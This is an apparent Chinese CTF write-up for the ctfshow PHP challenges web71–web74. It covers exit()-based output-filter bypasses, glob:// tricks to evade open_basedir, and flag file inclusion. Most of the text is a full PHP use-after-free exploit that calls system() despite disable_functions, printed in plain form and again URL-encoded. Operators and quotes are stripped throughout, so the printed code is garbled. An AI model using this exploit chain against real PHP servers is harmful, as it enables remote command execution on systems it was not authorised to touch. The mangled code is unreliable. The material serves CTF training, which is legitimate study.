目录 1、web71
2、web72
3、web73
4、web74 1、web71 像上一题那样扫描，但是输出全是问号。查看提示：我们可以结合 exit() 函数执行 PHP 代码，让后面的匹配缓冲区不执行，直接退出。
payload：
cvar_export(scandir(/));exit(); 同理读取 flag.txt
cinclude(/flag.txt);exit(); ctfshow{a9800fd2-9767-40e5-a824-106718643f80}
才发现这道题给了 index.php 的源码，查看一下：这里会将字母和数字都替换为问号进行输出。我们直接在执行完 include 包含语句后执行 exit 强制退出，从而绕过 preg_replace 的执行。 2、web72
下载 index.php，发现与上一道题一样，但是目录扫描发现只有权限扫当前目录下的文件，无法扫到上层路径下的文件，当然也包括根目录下的。尝试使用 scandir() 函数来扫描根目录，但由于 open_basedir 限制，这个操作被禁止了。open_basedir 是 PHP 的一个安全配置指令，用来限制 PHP 脚本只能访问特定的目录。当前配置只允许访问 /var/www/html/ 目录及其子目录，不允许访问其他目录。使用 glob:// 伪协议绕过 open_basedir，读取根目录下的文件，payload：
c??php $anew DirectoryIterator(glob:///*);
foreach($a as $f)
{echo($f-__toString(). );
}
exit(0);
?或者不要 ??php 和 ?
c$anew DirectoryIterator(glob:///*);
foreach($a as $f)
{echo($f-__toString(). );
}
exit(0);
解释
$a new DirectoryIterator(glob:///*); // 创建一个DirectoryIterator对象遍历根目录
foreach ($a as $f) { // 遍历每个条目echo($f-__toString() . ); // 输出条目的名称并添加一个空格
}
exit(0); // 终止脚本执行c$aopendir(glob:///*); while (($file readdir($a)) ! false){echo $file . br; };exit();
解释
$a opendir(glob:///*); // 打开根目录并将目录句柄赋值给$a
while (($file readdir($a)) ! false) { // 循环读取目录中的每个条目echo $file . br; // 输出每个条目的名称并添加HTML换行标签
};
exit(); // 终止脚本执行发现存在 flag0.txt
利用 UAF 的脚本进行命令执行
尝试执行 ls /; cat /flag0.txt 命令
c??php
pwn(ls /;cat /flag0.txt);function pwn($cmd) {global $abc, $helper, $backtrace;class Vuln {public $a;public function __destruct() { global $backtrace; unset($this-a);$backtrace (new Exception)-getTrace(); # ;)if(!isset($backtrace[1][args])) { # PHP 7.4$backtrace debug_backtrace();}}}class Helper {public $a, $b, $c, $d;}function str2ptr($str, $p 0, $s 8) {$address 0;for($j $s-1; $j 0; $j--) {$address 8;$address | ord($str[$p$j]);}return $address;}function ptr2str($ptr, $m 8) {$out ;for ($i0; $i $m; $i) {$out . sprintf(%c,$ptr 0xff);$ptr 8;}return $out;}function write($str, $p, $v, $n 8) {$i 0;for($i 0; $i $n; $i) {$str[$p $i] sprintf(%c,$v 0xff);$v 8;}}function leak($addr, $p 0, $s 8) {global $abc, $helper;write($abc, 0x68, $addr $p - 0x10);$leak strlen($helper-a);if($s ! 8) { $leak % 2 ($s * 8) - 1; }return $leak;}function parse_elf($base) {$e_type leak($base, 0x10, 2);$e_phoff leak($base, 0x20);$e_phentsize leak($base, 0x36, 2);$e_phnum leak($base, 0x38, 2);for($i 0; $i $e_phnum; $i) {$header $base $e_phoff $i * $e_phentsize;$p_type leak($header, 0, 4);$p_flags leak($header, 4, 4);$p_vaddr leak($header, 0x10);$p_memsz leak($header, 0x28);if($p_type 1 $p_flags 6) { # PT_LOAD, PF_Read_Write# handle pie$data_addr $e_type 2 ? $p_vaddr : $base $p_vaddr;$data_size $p_memsz;} else if($p_type 1 $p_flags 5) { # PT_LOAD, PF_Read_exec$text_size $p_memsz;}}if(!$data_addr || !$text_size || !$data_size)return false;return [$data_addr, $text_size, $data_size];}function get_basic_funcs($base, $elf) {list($data_addr, $text_size, $data_size) $elf;for($i 0; $i $data_size / 8; $i) {$leak leak($data_addr, $i * 8);if($leak - $base 0 $leak - $base $data_addr - $base) {$deref leak($leak);# constant constant checkif($deref ! 0x746e6174736e6f63)continue;} else continue;$leak leak($data_addr, ($i 4) * 8);if($leak - $base 0 $leak - $base $data_addr - $base) {$deref leak($leak);# bin2hex constant checkif($deref ! 
0x786568326e6962)continue;} else continue;return $data_addr $i * 8;}}function get_binary_base($binary_leak) {$base 0;$start $binary_leak 0xfffffffffffff000;for($i 0; $i 0x1000; $i) {$addr $start - 0x1000 * $i;$leak leak($addr, 0, 7);if($leak 0x10102464c457f) { # ELF headerreturn $addr;}}}function get_system($basic_funcs) {$addr $basic_funcs;do {$f_entry leak($addr);$f_name leak($f_entry, 0, 6);if($f_name 0x6d6574737973) { # systemreturn leak($addr 8);}$addr 0x20;} while($f_entry ! 0);return false;}function trigger_uaf($arg) {# str_shuffle prevents opcache string interning$arg str_shuffle(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA);$vuln new Vuln();$vuln-a $arg;}if(stristr(PHP_OS, WIN)) {die(This PoC is for *nix systems only.);}$n_alloc 10; # increase this value if UAF fails$contiguous [];for($i 0; $i $n_alloc; $i)$contiguous[] str_shuffle(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA);trigger_uaf(x);$abc $backtrace[1][args][0];$helper new Helper;$helper-b function ($x) { };if(strlen($abc) 79 || strlen($abc) 0) {die(UAF failed);}# leaks$closure_handlers str2ptr($abc, 0);$php_heap str2ptr($abc, 0x58);$abc_addr $php_heap - 0xc8;# fake valuewrite($abc, 0x60, 2);write($abc, 0x70, 6);# fake referencewrite($abc, 0x10, $abc_addr 0x60);write($abc, 0x18, 0xa);$closure_obj str2ptr($abc, 0x20);$binary_leak leak($closure_handlers, 8);if(!($base get_binary_base($binary_leak))) {die(Couldnt determine binary base address);}if(!($elf parse_elf($base))) {die(Couldnt parse ELF header);}if(!($basic_funcs get_basic_funcs($base, $elf))) {die(Couldnt get basic_functions address);}if(!($zif_system get_system($basic_funcs))) {die(Couldnt get zif_system address);}# fake closure object$fake_obj_offset 0xd0;for($i 0; $i 0x110; $i 8) {write($abc, $fake_obj_offset $i, leak($closure_obj, $i));}# pwnwrite($abc, 0x20, $abc_addr $fake_obj_offset);write($abc, 0xd0 0x38, 1, 4); # internal func typewrite($abc, 0xd0 0x68, 
$zif_system); # internal func handler($helper-b)($cmd);exit();
}
URL 编码后传入 payload：
c%3f%3e%3c%3fphp%0apwn(%22ls%2f%3bcat%2fflag0.txt%22)%3b%0a%0afunctionpwn(%24cmd)%7b%0aglobal%24abc%2c%24helper%2c%24backtrace%3b%0aclassVuln%7b%0apublic%24a%3b%0apublicfunction__destruct()%7b%0aglobal%24backtrace%3b%0aunset(%24this-%3ea)%3b%0a%24backtrace%3d(newException)-%3egetTrace()%3b%23%3b)%0aif(!isset(%24backtrace%5b1%5d%5b%27args%27%5d))%7b%23PHP%3e%3d7.4%0a%24backtrace%3ddebug_backtrace()%3b%0a%7d%0a%7d%0a%7d%0a%0aclassHelper%7b%0apublic%24a%2c%24b%2c%24c%2c%24d%3b%0a%7d%0a%0afunctionstr2ptr(%26%24str%2c%24p%3d0%2c%24s%3d8)%7b%0a%24address%3d0%3b%0afor(%24j%3d%24s-1%3b%24j%3e%3d0%3b%24j--)%7b%0a%24address%3c%3c%3d8%3b%0a%24address%7c%3dord(%24str%5b%24p%2b%24j%5d)%3b%0a%7d%0areturn%24address%3b%0a%7d%0a%0afunctionptr2str(%24ptr%2c%24m%3d8)%7b%0a%24out%3d%22%22%3b%0afor(%24i%3d0%3b%24i%3c%24m%3b%24i%2b%2b)%7b%0a%24out.%3dsprintf(%27%25c%27%2c%24ptr%260xff)%3b%0a%24ptr%3e%3e%3d8%3b%0a%7d%0areturn%24out%3b%0a%7d%0a%0afunctionwrite(%26%24str%2c%24p%2c%24v%2c%24n%3d8)%7b%0a%24i%3d0%3b%0afor(%24i%3d0%3b%24i%3c%24n%3b%24i%2b%2b)%7b%0a%24str%5b%24p%2b%24i%5d%3dsprintf(%27%25c%27%2c%24v%260xff)%3b%0a%24v%3e%3e%3d8%3b%0a%7d%0a%7d%0a%0afunctionleak(%24addr%2c%24p%3d0%2c%24s%3d8)%7b%0aglobal%24abc%2c%24helper%3b%0awrite(%24abc%2c0x68%2c%24addr%2b%24p-0x10)%3b%0a%24leak%3dstrlen(%24helper-%3ea)%3b%0aif(%24s!%3d8)%7b%24leak%25%3d2%3c%3c(%24s*8)-1%3b%7d%0areturn%24leak%3b%0a%7d%0a%0afunctionparse_elf(%24base)%7b%0a%24e_type%3dleak(%24base%2c0x10%2c2)%3b%0a%0a%24e_phoff%3dleak(%24base%2c0x20)%3b%0a%24e_phentsize%3dleak(%24base%2c0x36%2c2)%3b%0a%24e_phnum%3dleak(%24base%2c0x38%2c2)%3b%0a%0afor(%24i%3d0%3b%24i%3c%24e_phnum%3b%24i%2b%2b)%7b%0a%24header%3d%24base%2b%24e_phoff%2b%24i*%24e_phentsize%3b%0a%24p_type%3dleak(%24header%2c0%2c4)%3b%0a%24p_flags%3dleak(%24header%2c4%2c4)%3b%0a%24p_vaddr%3dleak(%24header%2c0x10)%3b%0a%24p_memsz%3dleak(%24header%2c0x28)%3b%0a%0aif(%24p_type%3d%3d1%26%26%24p_flags%3d%3d6)%7b%23PT_LOAD%2cPF_Read_Write%0a%23handlepie%0a%24data_addr%3d%24e_t
ype%3d%3d2%3f%24p_vaddr%3a%24base%2b%24p_vaddr%3b%0a%24data_size%3d%24p_memsz%3b%0a%7delseif(%24p_type%3d%3d1%26%26%24p_flags%3d%3d5)%7b%23PT_LOAD%2cPF_Read_exec%0a%24text_size%3d%24p_memsz%3b%0a%7d%0a%7d%0a%0aif(!%24data_addr%7c%7c!%24text_size%7c%7c!%24data_size)%0areturnfalse%3b%0a%0areturn%5b%24data_addr%2c%24text_size%2c%24data_size%5d%3b%0a%7d%0a%0afunctionget_basic_funcs(%24base%2c%24elf)%7b%0alist(%24data_addr%2c%24text_size%2c%24data_size)%3d%24elf%3b%0afor(%24i%3d0%3b%24i%3c%24data_size%2f8%3b%24i%2b%2b)%7b%0a%24leak%3dleak(%24data_addr%2c%24i*8)%3b%0aif(%24leak-%24base%3e0%26%26%24leak-%24base%3c%24data_addr-%24base)%7b%0a%24deref%3dleak(%24leak)%3b%0a%23%27constant%27constantcheck%0aif(%24deref!%3d0x746e6174736e6f63)%0acontinue%3b%0a%7delsecontinue%3b%0a%0a%24leak%3dleak(%24data_addr%2c(%24i%2b4)*8)%3b%0aif(%24leak-%24base%3e0%26%26%24leak-%24base%3c%24data_addr-%24base)%7b%0a%24deref%3dleak(%24leak)%3b%0a%23%27bin2hex%27constantcheck%0aif(%24deref!%3d0x786568326e6962)%0acontinue%3b%0a%7delsecontinue%3b%0a%0areturn%24data_addr%2b%24i*8%3b%0a%7d%0a%7d%0a%0afunctionget_binary_base(%24binary_leak)%7b%0a%24base%3d0%3b%0a%24start%3d%24binary_leak%260xfffffffffffff000%3b%0afor(%24i%3d0%3b%24i%3c0x1000%3b%24i%2b%2b)%7b%0a%24addr%3d%24start-0x1000*%24i%3b%0a%24leak%3dleak(%24addr%2c0%2c7)%3b%0aif(%24leak%3d%3d0x10102464c457f)%7b%23ELFheader%0areturn%24addr%3b%0a%7d%0a%7d%0a%7d%0a%0afunctionget_system(%24basic_funcs)%7b%0a%24addr%3d%24basic_funcs%3b%0ado%7b%0a%24f_entry%3dleak(%24addr)%3b%0a%24f_name%3dleak(%24f_entry%2c0%2c6)%3b%0a%0aif(%24f_name%3d%3d0x6d6574737973)%7b%23system%0areturnleak(%24addr%2b8)%3b%0a%7d%0a%24addr%2b%3d0x20%3b%0a%7dwhile(%24f_entry!%3d0)%3b%0areturnfalse%3b%0a%7d%0a%0afunctiontrigger_uaf(%24arg)%7b%0a%23str_shufflepreventsopcachestringinterning%0a%24arg%3dstr_shuffle(%27AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%27)%3b%0a%24vuln%3dnewVuln()%3b%0a%24vuln-%3ea%3d%24arg%3b%0a%7d%0a%0aif(stristr(PHP_OS%2
c%27WIN%27))%7b%0adie(%27ThisPoCisfor*nixsystemsonly.%27)%3b%0a%7d%0a%0a%24n_alloc%3d10%3b%23increasethisvalueifUAFfails%0a%24contiguous%3d%5b%5d%3b%0afor(%24i%3d0%3b%24i%3c%24n_alloc%3b%24i%2b%2b)%0a%24contiguous%5b%5d%3dstr_shuffle(%27AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%27)%3b%0a%0atrigger_uaf(%27x%27)%3b%0a%24abc%3d%24backtrace%5b1%5d%5b%27args%27%5d%5b0%5d%3b%0a%0a%24helper%3dnewHelper%3b%0a%24helper-%3eb%3dfunction(%24x)%7b%7d%3b%0a%0aif(strlen(%24abc)%3d%3d79%7c%7cstrlen(%24abc)%3d%3d0)%7b%0adie(%22UAFfailed%22)%3b%0a%7d%0a%0a%23leaks%0a%24closure_handlers%3dstr2ptr(%24abc%2c0)%3b%0a%24php_heap%3dstr2ptr(%24abc%2c0x58)%3b%0a%24abc_addr%3d%24php_heap-0xc8%3b%0a%0a%23fakevalue%0awrite(%24abc%2c0x60%2c2)%3b%0awrite(%24abc%2c0x70%2c6)%3b%0a%0a%23fakereference%0awrite(%24abc%2c0x10%2c%24abc_addr%2b0x60)%3b%0awrite(%24abc%2c0x18%2c0xa)%3b%0a%0a%24closure_obj%3dstr2ptr(%24abc%2c0x20)%3b%0a%0a%24binary_leak%3dleak(%24closure_handlers%2c8)%3b%0aif(!(%24base%3dget_binary_base(%24binary_leak)))%7b%0adie(%22Couldn%27tdeterminebinarybaseaddress%22)%3b%0a%7d%0a%0aif(!(%24elf%3dparse_elf(%24base)))%7b%0adie(%22Couldn%27tparseELFheader%22)%3b%0a%7d%0a%0aif(!(%24basic_funcs%3dget_basic_funcs(%24base%2c%24elf)))%7b%0adie(%22Couldn%27tgetbasic_functionsaddress%22)%3b%0a%7d%0a%0aif(!(%24zif_system%3dget_system(%24basic_funcs)))%7b%0adie(%22Couldn%27tgetzif_systemaddress%22)%3b%0a%7d%0a%0a%23fakeclosureobject%0a%24fake_obj_offset%3d0xd0%3b%0afor(%24i%3d0%3b%24i%3c0x110%3b%24i%2b%3d8)%7b%0awrite(%24abc%2c%24fake_obj_offset%2b%24i%2cleak(%24closure_obj%2c%24i))%3b%0a%7d%0a%0a%23pwn%0awrite(%24abc%2c0x20%2c%24abc_addr%2b%24fake_obj_offset)%3b%0awrite(%24abc%2c0xd0%2b0x38%2c1%2c4)%3b%23internalfunctype%0awrite(%24abc%2c0xd0%2b0x68%2c%24zif_system)%3b%23internalfunchandler%0a%0a(%24helper-%3eb)(%24cmd)%3b%0aexit()%3b%0a%7d 拿到 flagctfshow{3deb8d00-68e6-4c20-a971-3fbf3382ec45} 3、web73
用上一题的方法先读取目录：
c$anew DirectoryIterator(glob:///*);
foreach($a as $f)
{echo($f-__toString(). );
}
exit(0);
发现根目录下存在 flagc.txt，也可以使用前面的目录扫描：
cvar_export(scandir(/));exit(); 还可以使用 echo 输出指定数组索引的文件
cecho(scandir(/)[6]);exit(); 这道题可以直接使用 include 进行包含
cinclude(/flagc.txt);exit(0); 拿到 flagctfshow{8fccf5bc-5681-4815-b7ce-0b81772b6f7c} 4、web74
scandir() 又被禁用了，采用 glob:// 协议读取：
c$aopendir(glob:///*); while (($file readdir($a)) ! false){echo $file . br; };exit();
存在 flagx.txt，直接包含：
cinclude(/flagx.txt);exit(); 拿到 flagctfshow{35309fb4-36c5-4080-874a-6eaa85e03ff0}